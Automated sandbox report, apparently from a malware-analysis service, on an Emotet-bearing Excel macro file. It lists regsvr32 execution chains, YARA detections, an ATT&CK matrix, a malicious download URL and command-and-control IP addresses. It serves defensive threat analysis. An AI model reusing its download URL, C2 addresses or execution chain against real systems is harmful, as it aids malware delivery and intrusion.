                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Qjxnmbewg\psrzxbseam.bej"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Xuxdamzseerbd\xnhieyc.mhi"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Txlhge\upsbekiq.mnw"
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Qitnzewoiifn\ioax.zvc"
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wjrcyousgqt\whqvqq.kkc"
                        Source: Yara matchFile source: app.xml, type: SAMPLE
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _LcidFromHexString,GetLocaleInfoA,3_2_100690A2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,3_2_10069138
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,3_2_100691AA
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,3_2_1006937A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,3_2_1006745A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_10069465
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_100694CA
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,3_2_10069506
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,3_2_10019571
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,3_2_100676DE
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,__alloca_probe_16,_malloc,GetLocaleInfoA,MultiByteToWideChar,__freea,3_2_10069730
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoA,3_2_10059766
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: __crtGetLocaleInfoW_stat,3_2_1006986B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,3_2_100698A6
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,3_2_100679A2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: __crtGetLocaleInfoA_stat,3_2_100699E3
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,3_2_10071CA2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoA,3_2_10069CCE
                        Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10063CA7 cpuid 3_2_10063CA7
                        Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10056B81 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,3_2_10056B81
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1005C6D9 __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,3_2_1005C6D9
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10048B58 GetProcessHeap,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,__heap_term,__RTC_Initialize,GetCommandLineA,___crtGetEnvironmentStringsA,__ioinit,__mtterm,__setargv,__setenvp,__cinit,__ioterm,__ioterm,__mtterm,__heap_term,___set_flsgetvalue,__calloc_crt,__decode_pointer,__initptd,GetCurrentThreadId,__freeptd,3_2_10048B58

                        Stealing of Sensitive Information

                        barindex
                        Yara detected Emotet
                        Source: Yara matchFile source: 5.2.regsvr32.exe.980000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.regsvr32.exe.150000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.regsvr32.exe.110000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.regsvr32.exe.240000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.regsvr32.exe.460000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.regsvr32.exe.310000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.regsvr32.exe.1f0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.regsvr32.exe.230000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.regsvr32.exe.420000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.regsvr32.exe.920000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.regsvr32.exe.110000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.regsvr32.exe.110000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.regsvr32.exe.3f0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.regsvr32.exe.470000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.regsvr32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.regsvr32.exe.240000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.regsvr32.exe.180000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.regsvr32.exe.230000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.regsvr32.exe.570000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.regsvr32.exe.1c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.regsvr32.exe.280000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.regsvr32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.regsvr32.exe.150000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.regsvr32.exe.110000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.regsvr32.exe.3f0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.regsvr32.exe.5d0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.regsvr32.exe.500000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.regsvr32.exe.3b0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.regsvr32.exe.110000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.regsvr32.exe.1b0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.regsvr32.exe.1c0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.regsvr32.exe.950000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.regsvr32.exe.180000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.regsvr32.exe.310000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.regsvr32.exe.180000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.regsvr32.exe.5d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.regsvr32.exe.180000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.regsvr32.exe.110000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.regsvr32.exe.920000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000003.00000002.438925109.0000000000461000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.714099978.0000000000501000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.483801415.0000000000110000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.510846343.0000000000231000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.483924206.0000000000471000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.456286070.0000000000981000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.713962264.0000000000240000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.456044054.00000000005D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.468918489.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.504764395.0000000000231000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.449507584.0000000000110000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.490790525.0000000000951000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.474514223.0000000000150000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.449723036.0000000000281000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.510821568.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000002.522451287.00000000001B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.504642074.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.474534768.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.497540117.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.497591181.0000000000421000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.462842300.0000000000310000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.462862121.0000000000571000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.438768483.0000000000110000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.490748655.0000000000920000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000002.522428757.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.469106015.00000000003B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1000B79D __EH_prolog3_GS,lstrlenW,__snprintf_s,CoTaskMemFree,CreateBindCtx,CoTaskMemFree,CoTaskMemFree,CoTaskMemFree,3_2_1000B79D
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1000A5B9 CreateBindCtx,CoTaskMemFree,3_2_1000A5B9

                        Mitre Att&ck Matrix

                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                        Valid Accounts21
                        Scripting                        		Path Interception111
                        Process Injection                        		1
                        Disable or Modify Tools                        		1
                        Input Capture                        		2
                        System Time Discovery                        		Remote Services1
                        Archive Collected Data                        		Exfiltration Over Other Network Medium12
                        Ingress Tool Transfer                        		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                        Default Accounts1
                        Native API                        		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                        Deobfuscate/Decode Files or Information                        		LSASS Memory2
                        File and Directory Discovery                        		Remote Desktop Protocol1
                        Input Capture                        		Exfiltration Over Bluetooth11
                        Encrypted Channel                        		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                        Domain Accounts43
                        Exploitation for Client Execution                        		Logon Script (Windows)Logon Script (Windows)21
                        Scripting                        		Security Account Manager37
                        System Information Discovery                        		SMB/Windows Admin Shares1
                        Clipboard Data                        		Automated Exfiltration2
                        Non-Application Layer Protocol                        		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
                        Obfuscated Files or Information                        		NTDS1
                        Query Registry                        		Distributed Component Object ModelInput CaptureScheduled Transfer123
                        Application Layer Protocol                        		SIM Card SwapCarrier Billing Fraud
                        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script131
                        Masquerading                        		LSA Secrets21
                        Security Software Discovery                        		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                        Replication Through Removable MediaLaunchdRc.commonRc.common1
                        Modify Registry                        		Cached Domain Credentials1
                        Virtualization/Sandbox Evasion                        		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                        External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                        Virtualization/Sandbox Evasion                        		DCSync1
                        Process Discovery                        		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job111
                        Process Injection                        		Proc Filesystem1
                        Application Window Discovery                        		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                        Hidden Files and Directories                        		/etc/passwd and /etc/shadow1
                        Remote System Discovery                        		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 581726 Sample: commenti_19265309.xlsm Startdate: 02/03/2022 Architecture: WINDOWS Score: 100 56 210.57.209.142 UNAIR-AS-IDUniversitasAirlanggaID Indonesia 2->56 58 45.71.195.104 TTELESLEITETELECOMUNICACOESLTDAMEBR Brazil 2->58 60 37 other IPs or domains 2->60 70 Multi AV Scanner detection for domain / URL 2->70 72 Found malware configuration 2->72 74 Antivirus detection for URL or domain 2->74 76 13 other signatures 2->76 15 EXCEL.EXE 7 19 2->15         started        signatures3 process4 dnsIp5 62 gymsportive.com 212.64.200.154, 49165, 80 ATLAS-ASTR Turkey 15->62 48 C:\Users\user\sei.ocx, PE32 15->48 dropped 50 C:\Users\user\AppData\...\Lg1r0mo1[1].dll, PE32 15->50 dropped 52 C:\Users\user\...\~$commenti_19265309.xlsm, data 15->52 dropped 64 Document exploit detected (creates forbidden files) 15->64 66 Document exploit detected (UrlDownloadToFile) 15->66 20 regsvr32.exe 2 15->20         started        file6 signatures7 process8 file9 54 C:\Windows\SysWOW64\...\tadr.wns (copy), PE32 20->54 dropped 80 Hides that the sample has been downloaded from the Internet (zone.identifier) 20->80 24 regsvr32.exe 1 20->24         started        signatures10 process11 signatures12 84 Hides that the sample has been downloaded from the Internet (zone.identifier) 24->84 27 regsvr32.exe 1 24->27         started        process13 signatures14 88 Hides that the sample has been downloaded from the Internet (zone.identifier) 27->88 30 regsvr32.exe 1 27->30         started        process15 signatures16 92 Hides that the sample has been downloaded from the Internet (zone.identifier) 30->92 33 regsvr32.exe 1 30->33         started        process17 signatures18 68 Hides that the sample has been downloaded from the Internet (zone.identifier) 33->68 36 regsvr32.exe 1 33->36         started        process19 signatures20 78 Hides that the sample has been downloaded from the Internet (zone.identifier) 36->78 39 regsvr32.exe 1 36->39         started        process21 signatures22 82 Hides that the sample has been downloaded from the Internet (zone.identifier) 39->82 42 regsvr32.exe 1 39->42         started        process23 signatures24 86 Hides that the sample has been downloaded from the Internet (zone.identifier) 42->86 45 regsvr32.exe 1 42->45         started        process25 signatures26 90 Hides that the sample has been downloaded from the Internet (zone.identifier) 45->90

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        commenti_19265309.xlsm51%ReversingLabsDocument-Word.Trojan.Emotet

                        Dropped Files

                        No Antivirus matches

                        Unpacked PE Files

                        SourceDetectionScannerLabelLinkDownload
                        13.2.regsvr32.exe.230000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        5.2.regsvr32.exe.980000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        12.2.regsvr32.exe.1c0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                        4.2.regsvr32.exe.110000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                        12.2.regsvr32.exe.230000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        9.2.regsvr32.exe.470000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        15.2.regsvr32.exe.240000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                        10.2.regsvr32.exe.920000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                        9.2.regsvr32.exe.110000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                        3.2.regsvr32.exe.460000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        6.2.regsvr32.exe.570000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        11.2.regsvr32.exe.420000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        7.2.regsvr32.exe.1f0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                        4.2.regsvr32.exe.280000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        8.2.regsvr32.exe.150000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                        11.2.regsvr32.exe.3f0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                        15.2.regsvr32.exe.500000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        7.2.regsvr32.exe.3b0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        14.2.regsvr32.exe.1b0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        10.2.regsvr32.exe.950000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        8.2.regsvr32.exe.1c0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        6.2.regsvr32.exe.310000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                        14.2.regsvr32.exe.180000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                        5.2.regsvr32.exe.5d0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                        13.2.regsvr32.exe.180000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                        3.2.regsvr32.exe.110000.0.unpack100%AviraHEUR/AGEN.1145233Download File

                        Domains

                        SourceDetectionScannerLabelLink
                        gymsportive.com6%VirustotalBrowse

                        URLs

                        SourceDetectionScannerLabelLink
                        http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                        https://168.119.39.118/.N0%Avira URL Cloudsafe
                        http://gymsportive.com/0zwe/pSiUh/14%VirustotalBrowse
                        http://gymsportive.com/0zwe/pSiUh/100%Avira URL Cloudmalware
                        http://ocsp.entrust.net030%URL Reputationsafe
                        https://168.119.39.118/RTqOvyibSpsqRLeCHAwzwsZUvkaT0%Avira URL Cloudsafe
                        https://168.119.39.118/0%Avira URL Cloudsafe
                        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                        http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                        https://168.119.39.118/RTqOvyibSpsqRLeCHAwzwsZUvkaTI0%Avira URL Cloudsafe
                        http://ocsp.entrust.net0D0%URL Reputationsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        gymsportive.com
                        		212.64.200.154
                        		truetrueunknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://gymsportive.com/0zwe/pSiUh/true
                        • 14%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        		unknown
                        https://168.119.39.118/RTqOvyibSpsqRLeCHAwzwsZUvkaTtrue
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://crl.pkioverheid.nl/DomOvLatestCRL.crl0regsvr32.exe, 0000000F.00000002.714076663.0000000000340000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000F.00000002.714272238.0000000003318000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://168.119.39.118/.Nregsvr32.exe, 0000000F.00000002.714066011.000000000032D000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://crl.entrust.net/server1.crl0regsvr32.exe, 0000000F.00000002.714076663.0000000000340000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000F.00000002.714272238.0000000003318000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://ocsp.entrust.net03regsvr32.exe, 0000000F.00000002.714076663.0000000000340000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000F.00000002.714272238.0000000003318000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://168.119.39.118/regsvr32.exe, 0000000F.00000002.714066011.000000000032D000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0regsvr32.exe, 0000000F.00000002.714076663.0000000000340000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.diginotar.nl/cps/pkioverheid0regsvr32.exe, 0000000F.00000002.714076663.0000000000340000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000F.00000002.714272238.0000000003318000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://168.119.39.118/RTqOvyibSpsqRLeCHAwzwsZUvkaTIregsvr32.exe, 0000000F.00000002.714070000.0000000000332000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://ocsp.entrust.net0Dregsvr32.exe, 0000000F.00000002.714272238.0000000003318000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://secure.comodo.com/CPS0regsvr32.exe, 0000000F.00000002.714076663.0000000000340000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000F.00000002.714272238.0000000003318000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://crl.entrust.net/2048ca.crl0regsvr32.exe, 0000000F.00000002.714272238.0000000003318000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              207.148.81.119
                              		unknownUnited States
                              		20473AS-CHOOPAUStrue
                              104.131.62.48
                              		unknownUnited States
                              		14061DIGITALOCEAN-ASNUStrue
                              194.9.172.107
                              		unknownunknown
                              		207992FEELBFRtrue
                              198.199.98.78
                              		unknownUnited States
                              		14061DIGITALOCEAN-ASNUStrue
                              54.37.106.167
                              		unknownFrance
                              		16276OVHFRtrue
                              59.148.253.194
                              		unknownHong Kong
                              		9269HKBN-AS-APHongKongBroadbandNetworkLtdHKtrue
                              103.41.204.169
                              		unknownIndonesia
                              		58397INFINYS-AS-IDPTInfinysSystemIndonesiaIDtrue
                              85.214.67.203
                              		unknownGermany
                              		6724STRATOSTRATOAGDEtrue
                              61.7.231.226
                              		unknownThailand
                              		9931CAT-APTheCommunicationAuthoityofThailandCATTHtrue
                              191.252.103.16
                              		unknownBrazil
                              		27715LocawebServicosdeInternetSABRtrue
                              93.104.209.107
                              		unknownGermany
                              		8767MNET-ASGermanyDEtrue
                              61.7.231.229
                              		unknownThailand
                              		9931CAT-APTheCommunicationAuthoityofThailandCATTHtrue
                              168.119.39.118
                              		unknownGermany
                              		24940HETZNER-ASDEtrue
                              168.197.250.14
                              		unknownArgentina
                              		264776OmarAnselmoRipollTDCNETARtrue
                              185.184.25.78
                              		unknownTurkey
                              		209711MUVHOSTTRtrue
                              66.42.57.149
                              		unknownUnited States
                              		20473AS-CHOOPAUStrue
                              185.148.168.15
                              		unknownGermany
                              		44780EVERSCALE-ASDEtrue
                              139.196.72.155
                              		unknownChina
                              		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdtrue
                              217.182.143.207
                              		unknownFrance
                              		16276OVHFRtrue
                              203.153.216.46
                              		unknownIndonesia
                              		45291SURF-IDPTSurfindoNetworkIDtrue
                              159.69.237.188
                              		unknownGermany
                              		24940HETZNER-ASDEtrue
                              45.71.195.104
                              		unknownBrazil
                              		267642TTELESLEITETELECOMUNICACOESLTDAMEBRtrue
                              116.124.128.206
                              		unknownKorea Republic of
                              		9318SKB-ASSKBroadbandCoLtdKRtrue
                              68.183.93.250
                              		unknownUnited States
                              		14061DIGITALOCEAN-ASNUStrue
                              78.46.73.125
                              		unknownGermany
                              		24940HETZNER-ASDEtrue
                              37.59.209.141
                              		unknownFrance
                              		16276OVHFRtrue
                              210.57.209.142
                              		unknownIndonesia
                              		38142UNAIR-AS-IDUniversitasAirlanggaIDtrue
                              87.106.97.83
                              		unknownGermany
                              		8560ONEANDONE-ASBrauerstrasse48DEtrue
                              185.148.168.220
                              		unknownGermany
                              		44780EVERSCALE-ASDEtrue
                              54.37.228.122
                              		unknownFrance
                              		16276OVHFRtrue
                              185.168.130.138
                              		unknownUkraine
                              		49720GIGACLOUD-ASUAtrue
                              190.90.233.66
                              		unknownColombia
                              		18678INTERNEXASAESPCOtrue
                              54.38.242.185
                              		unknownFrance
                              		16276OVHFRtrue
                              195.154.146.35
                              		unknownFrance
                              		12876OnlineSASFRtrue
                              195.77.239.39
                              		unknownSpain
